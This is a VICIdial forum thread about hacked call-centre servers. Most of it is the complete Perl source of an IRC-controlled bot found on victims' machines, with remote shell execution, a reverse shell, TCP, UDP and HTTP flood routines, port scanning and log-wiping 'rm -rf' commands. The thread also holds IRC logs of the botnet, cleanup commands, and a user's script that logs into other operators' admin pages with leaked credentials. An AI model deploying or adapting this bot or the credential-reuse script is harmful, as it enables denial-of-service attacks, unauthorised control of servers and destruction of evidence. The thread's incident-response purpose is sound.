05:11 -!- legend-8471561 [vici@XX.XX.XX.XX] has quit [Client exited]
vicidial:~ # ps aux|grep wwwrun
wwwrun 7604 0.0 0.3 151328 14020 ? S 07:30 0:08 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
...
DomeDan wrote:That one is a bit different. here is the file vici.txt:
- Code: Select all
#!/usr/bin/perl
###########################################################
#-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--#
###########################################################
# Legend Soldier [2012] DO NOT FUCKIN SHARE! #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Just the same old re-runs... #
###########################################################
# Added: #
# !legend @httpflood <host> <time> #
# !legend @clean #
# !legend @visit <webpage> #
# Oldies: #
# !legend @system #
# !legend @portscan <ip> #
# !legend @nmap <ip> <beginport> <endport> #
# !legend @back <ip><port> #
# !legend @sqlflood <host> <time> #
# !legend @udp <host> <packet size> <time> #
# !legend @udp2 <host> <packet size> <time> <port> #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
###########################################################
###########################################################
# addiCteD tO null!!! #
###########################################################
####################[Configuration]########################
###########################################################
my $hidden = 'init [3]';
my $linas_max='4';
my $sleep='5';
my @admins=("ARZ","god","Zax");
my @hostauth=("legendteam.info");
my @channels=("#vici");
my $nick='legend';
my $ircname ='vici';
my $realname = 'legend secrets!';
my $server='space.legendteam.info';
my $port='6667';
###########################################################
####################[Configuration]########################
###########################################################
####################[lets start..]#########################
###########################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
use LWP::UserAgent;
chdir("/");
$0="$hidden"."\0"x16;;
my $pid=fork;
exit if $pid;
die "fork problem: $!" unless defined($pid);
###########################################################
####################[lets start..]#########################
###########################################################
####################[Connecting...]########################
###########################################################
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
###########################################################
####################[Connecting...]########################
###########################################################
####################[..Connected..]########################
###########################################################
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION Legend IRC [2010]\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!legend)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick-".int rand(9999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $channel (@channels) {
sendraw("JOIN $channel sexy");
}
}
}
###########################################################
####################[..Functions..]########################
###########################################################
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
###########################################################
######################[..@system..]########################
###########################################################
if ($funcarg =~ /^system/) {
$uname=`uname -a`;
$uptime=`uptime`;
$ownd=`pwd`;
$distro=`cat /etc/issue`;
$id=`id`;
$un=`uname -sro`;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uname -a: 14 $uname");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uptime: 14 $uptime");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Process: 14 $hidden");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2ID: 14 $id");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Dir: 14 $ownd");
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2OS: 14 $distro");
}
###########################################################
######################[..@system..]########################
###########################################################
###########################################################
######################[.@portscan.]########################
###########################################################
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
@portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Scanning for open ports on ".$1." 12 started .");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Open ports founded: @aberta");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 No open ports foundend.");
}
}
###########################################################
######################[.@portscan.]########################
###########################################################
###########################################################
########################[.@Visit.]#########################
###########################################################
if ($funcarg =~ /^visit (.*)/) {
my $url = "$1";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0');
$ua->timeout(10);
$ua->env_proxy;
my $response = $ua->get($url);
if ($response->is_success) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Got Response From $url.");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Failed Getting Response From $url.");
}
}
###########################################################
########################[.@Visit.]#########################
###########################################################
###########################################################
######################[.@tcpflood.]########################
###########################################################
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:.4 TCP Attacking14 ".$1.":".$2." 2for4 ".$3." 2seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:. 4TCP Attack done 14".$1.":".$2.".");
}
###########################################################
######################[.@tcpflood.]########################
###########################################################
###########################################################
#####################[.@httpflood.]########################
###########################################################
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking14 ".$1." 4for4 ".$2." 2seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking done ".$1.".");
}
###########################################################
#####################[.@httpflood.]########################
###########################################################
###########################################################
######################[.@sqlflood.]########################
###########################################################
if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking 4 ".$1." 14 on port 3306 for 4 ".$2." 2 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking done 14 ".$1.".");
}
###########################################################
######################[.@sqlflood.]########################
###########################################################
###########################################################
######################[.@udpflood.]########################
###########################################################
if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Attacking14 ".$1." 4with2 ".$2." 2KB(s) for4 ".$3." 2seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
}
###########################################################
######################[.@udpflood.]########################
###########################################################
###########################################################
######################[.@udp2flood.]########################
###########################################################
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Attacking14 ".$1.":".$4." 2with4 ".$2." 2KB(s) for4 ".$3." 2seconds.");
my ($dtime, %pacotes) = udpflooder2("$1", "$2", "$3","$4");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
}
############################################################
###########################################################
######################[.@cleanlogs.]#######################
###########################################################
if ($funcarg =~ /^cleanlogs/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 This process can be long2,4 just wait2!");
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 All default log and bash_history files erased");
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Now Erasing the rest of the machine log files");
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Done! All logs erased");
}
###########################################################
######################[.@cleanlogs.]#######################
###########################################################
###########################################################
########################[..@back..]########################
###########################################################
if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas){
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Back Connect2:.14 Connecting to 2 $host:$porta");
}
}
###########################################################
########################[..@back..]########################
###########################################################
###########################################################
#########################[.@nmap.]#########################
###########################################################
if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
my $hostip="$1";
my $portstart = "$2";
my $portend = "$3";
my (@abertas, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Scanning $1 For Ports: $2-$3");
foreach my $porta ($portstart..$portend){
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($xstats){
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Founded $porta"."/Open");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Complete");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 No open ports have been founded");
}
}
###########################################################
#########################[.@nmap.]#########################
###########################################################
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1; $port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub udpflooder2 {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my $udpport = $_[3];
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
It got a lot of nice features. use this "PRIVATE-SHIT" as much as you like
they are controlling the servers with irc,
I joined the channel and they got a lot of bots in #vici:22:05:17-!- domedan [domedan@bredband.telia.com] has joined #vici
22:05:17[Users #vici]
22:05:17[@Arz ] [ legend-2114407] [ legend-4141544] [ legend-5216791] [ legend-6564188] [ legend-902578 ]
22:05:17[@legend ] [ legend-2219609] [ legend-4205939] [ legend-5453424] [ legend-6606186] [ legend-9074556 ]
22:05:17[@Zax ] [ legend-2399867] [ legend-4269871] [ legend-5457869] [ legend-6706281] [ legend-9085946 ]
22:05:17[ domedan ] [ legend-2472740] [ legend-4411230] [ legend-5506832] [ legend-6804481] [ legend-9106466 ]
22:05:17[ legend-1053838] [ legend-2532484] [ legend-4463938] [ legend-5613237] [ legend-6939433] [ legend-9121552 ]
22:05:17[ legend-1154062] [ legend-2573772] [ legend-4490485] [ legend-5773081] [ legend-7086824] [ legend-9175657 ]
22:05:17[ legend-119405 ] [ legend-2593175] [ legend-4621717] [ legend-5792627] [ legend-7277080] [ legend-9290305 ]
22:05:17[ legend-1196016] [ legend-2738087] [ legend-4670232] [ legend-5797741] [ legend-7323799] [ legend-9362856 ]
22:05:17[ legend-1228289] [ legend-2763621] [ legend-4690292] [ legend-5811294] [ legend-7411641] [ legend-9532331 ]
22:05:17[ legend-1301620] [ legend-2854885] [ legend-4717048] [ legend-5845477] [ legend-7492307] [ legend-9541299 ]
22:05:17[ legend-1403000] [ legend-3011003] [ legend-4757422] [ legend-59046 ] [ legend-7566805] [ legend-9597850 ]
22:05:17[ legend-1500923] [ legend-3130239] [ legend-4792816] [ legend-5971684] [ legend-7590112] [ legend-9618615 ]
22:05:17[ legend-1551443] [ legend-3284672] [ legend-4810559] [ legend-5987907] [ legend-7596290] [ legend-9719818 ]
22:05:17[ legend-1640994] [ legend-3437207] [ legend-4816366] [ legend-6018961] [ legend-7603667] [ legend-972908-1472135]
22:05:17[ legend-1903723] [ legend-3481315] [ legend-4845444] [ legend-6035015] [ legend-7719432] [ legend-9838014 ]
22:05:17[ legend-1921205] [ legend-3489298] [ legend-4871822] [ legend-6261054] [ legend-7782481] [ legend-9862820 ]
22:05:17[ legend-198544 ] [ legend-3551466] [ legend-493663 ] [ legend-629499 ] [ legend-7946213]
22:05:17[ legend-2028755] [ legend-3901269] [ legend-5029084] [ legend-6337581] [ legend-8092993]
22:05:17[ legend-2041938] [ legend-4093763] [ legend-5037497] [ legend-6339421] [ legend-8603140]
22:05:17[ legend-2064633] [ legend-409732 ] [ legend-509556 ] [ legend-6377342] [ legend-8605492]
22:05:17[ legend-2088615] [ legend-4123099] [ legend-515754 ] [ legend-6394740] [ legend-8885262]
22:05:17-!- Irssi: #vici: Total of 121 nicks [3 ops, 0 halfops, 0 voices, 118 normal]
22:05:17-!- Channel #vici created Wed Jul 25 11:47:52 2012
22:05:17-!- Irssi: Join to #vici was synced in 0 secs
22:06:38[space] -!- #zax Arz H* 0 hacktech@legendteam.info [TheChozen]
22:06:38[space] -!- End of /WHO list
22:06:52[space] -!- #vici legend H 0 vici@72.21.12.168 [legend secrets!]
22:06:52[space] -!- End of /WHO list
22:07:14[space] -!- #perl Zax H* 0 Zax@legendteam.info [Zax]
22:07:14[space] -!- End of /WHO list
117 vicidial-servers probably, not bad...
the holes should be fixed, can you guys who have been hacked post your logs somewhere so we can figure out what vulnerability they are using to get to the listloader
/usr/bin/find /srv/www/htdocs -iname new_listloader_superL.php | xargs rm -f
/usr/bin/find /srv/www/htdocs -iname listloader_super.pl | xargs rm -f
/usr/bin/find /srv/www/htdocs -iname listloader.pl | xargs rm -f
mcargile wrote:The big issue is that someone has added this vulnerability to a script kiddy attack tool kit. The tool kit probably scans for tons of different vulnerabilities and executes the appropriate one, then lets you install various other things. That is why some people have DDOS software installed, others back doors.
As Matt stated we have made it so that the installer in SVN will not install the old list loader. It is still in the extras code directory, but it will not be installed by default. The installer will also delete the old list loader from already installed systems during an upgrade. We highly recommend upgrading, but if you do not want to do so you can also just delete that list loader. The files in question are in the vicidial directory under web root and are called new_listloader_superL.php, listloader_super.pl, and listloader.pl.
If you are running the OpenSuSE version of Vicibox, you cat run the following commands to get rid of the files:
- Code: Select all
/usr/bin/find /srv/www/htdocs -iname new_listloader_superL.php | xargs rm -f
/usr/bin/find /srv/www/htdocs -iname listloader_super.pl | xargs rm -f
/usr/bin/find /srv/www/htdocs -iname listloader.pl | xargs rm -f
If you are running something else you will need to replace /srv/www/htdocs with the web root directory for your apache config.
spacejanitor wrote:Indeed.
Our server didn't have this IRC bot installed, however it's great that DomeDan and rrb555 were able to find these intrusions on their systems. I hope there's some way to put out an alert to the community about this once we find out the most probable way it occurred.
10:46 <@Zax> !legend @visit http://www.spidertopweb.com/index2.html
10:46 < legend-3551466> .:Visit:. Got Response From http://www.spidertopweb.com/index2.html.
10:46 < legend-9106466> .:Visit:. Got Response From http://www.spidertopweb.com/index2.html.
10:46 < legend-9541299> .:Visit:. Got Response From http://www.spidertopweb.com/index2.html.
...
williamconley wrote:How is spidertopweb connected? Was this a DOS attack command?
###########################################################
########################[.@Visit.]#########################
###########################################################
if ($funcarg =~ /^visit (.*)/) {
my $url = "$1";
my $ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0');
$ua->timeout(10);
$ua->env_proxy;
my $response = $ua->get($url);
if ($response->is_success) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Got Response From $url.");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Failed Getting Response From $url.");
}
}
rrb555 wrote:how can u tell which server (ip address) was been hacked?
#!/bin/bash
VICTIMS_IP_FILE="list_of_vicidial_ip_adresses.txt"
N=0
TOT_VICTIMS=$(cat $VICTIMS_IP_FILE | sed '/^$/d' | wc -l) #remove empty lines with sed
cat $VICTIMS_IP_FILE | sed '/^$/d' | while read HOST ; do
N=$((N+1))
echo "### host $N/$TOT_VICTIMS - $HOST ###"
curl $HOST/vicidial/project_auth_entries.txt | cut -d'|' -f2,4,5 | grep 'GOOD' | grep -v '|XXXX' | sort | uniq | while read AUTH_ENTRIES ; do
echo "testing $AUTH_ENTRIES"
USER=$( echo $AUTH_ENTRIES | cut -d'|' -f2)
PASS=$( echo $AUTH_ENTRIES | cut -d'|' -f3)
if [ -z $PASS ]; then
echo "--- Password empty for $HOST user $USER pass $PASS"
echo ""
else
wget -t 3 -c http://$HOST/vicidial/admin.php --post-data 'ADD=21&park_ext=&campaign_id=_HACKED_&campaign_name=read+the+description+for+more+info&campaign_description=Your+server+has+been+hacked.+read+more+here%3A+www.vicidial.org%2FVICIDIALforum%2Fviewtopic.php%3Ft%3D25534+Regards+DomeDan.+if+the+link+is+broken+then+look+for+the+thread+on+the+vicidial+forum+its+named%3A+We+were+hacked+Security+vulnerability+in+lead+loader&active=N&park_file_name=&web_form_address=&allow_closers=Y&hopper_level=1&auto_dial_level=1&next_agent_call=random&local_call_time=12pm-5pm&voicemail_ext=&script_id=&get_call_launch=NONE&SUBMIT=SUBMIT' --http-user=$USER --http-passwd=$PASS
if [ $? -eq 0 ]; then
echo "--- Campaign CREATED on host $HOST user $USER pass $PASS"
echo ""
continue #go back to the first loop
else
echo "--- Failed creating campaign on host $HOST user $USER pass $PASS"
echo ""
fi
fi
done
done
svsval wrote:How did the link to this post appear on our dialer?
